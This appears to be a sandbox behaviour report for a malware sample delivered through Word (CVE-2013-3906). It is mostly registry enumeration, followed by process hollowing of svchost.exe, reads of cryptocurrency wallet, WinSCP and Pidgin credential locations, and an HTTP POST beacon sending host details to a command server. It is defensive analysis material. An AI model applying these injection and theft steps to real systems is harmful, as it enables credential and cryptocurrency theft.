regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0
buffer Buffer with sha1: d84645b497a6c14e439dcc66d8afbd5112ee3728
host 172.217.25.14
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

NtAllocateVirtualMemory

process_identifier: 8740
region_size: 294912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000031c
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Users\test22\AppData\Roaming\Bitcoin\wallets
file C:\Users\test22\AppData\Roaming\Electrum\wallets
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 8740
process_handle: 0x0000031c
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
Process injection Process 6928 called NtSetContextThread to modify thread in remote process 8740
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4199552
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000318
process_identifier: 8740
1 0 0
com_class Scripting.FileSystemObject May attempt to write one or more files to the harddisk
cve CVE-2013-3906
parent_process winword.exe martian_process rundll32.exe c:\users\test22\appdata\roaming\microsoft\word\startup\zs.z,XBDOAOUFMRH
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=1705_wxa09&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=1705_wxa09&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
Process injection Process 6928 resumed a thread in remote process 8740
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000318
suspend_count: 1
process_identifier: 8740
1 0 0
file C:\Users\test22\AppData\Local\Temp\fax.f
dead_host 45.90.46.59:80
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000040c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

thread_handle: 0x0000042c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

thread_handle: 0x0000048c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

thread_handle: 0x000004a4
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

thread_handle: 0x00000514
suspend_count: 1
process_identifier: 8024
1 0 0

CreateProcessInternalW

thread_identifier: 7636
thread_handle: 0x000005b8
process_identifier: 6928
current_directory:
filepath:
track: 1
command_line: rundll32.exe c:\users\test22\appdata\roaming\microsoft\word\startup\zs.z,XBDOAOUFMRH
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000005b4
1 1 0

NtResumeThread

thread_handle: 0x00000654
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

thread_handle: 0x00000664
suspend_count: 1
process_identifier: 8024
1 0 0

CreateProcessInternalW

thread_identifier: 7772
thread_handle: 0x00000318
process_identifier: 8740
current_directory:
filepath:
track: 1
command_line: C:\Windows\System32\svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 1060 (CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000031c
1 1 0

NtAllocateVirtualMemory

process_identifier: 8740
region_size: 294912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000031c
1 0 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 8740
process_handle: 0x0000031c
1 1 0

NtGetContextThread

thread_handle: 0x00000318
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 8740
process_handle: 0x0000031c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4199552
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000318
process_identifier: 8740
1 0 0

NtResumeThread

thread_handle: 0x00000318
suspend_count: 1
process_identifier: 8740
1 0 0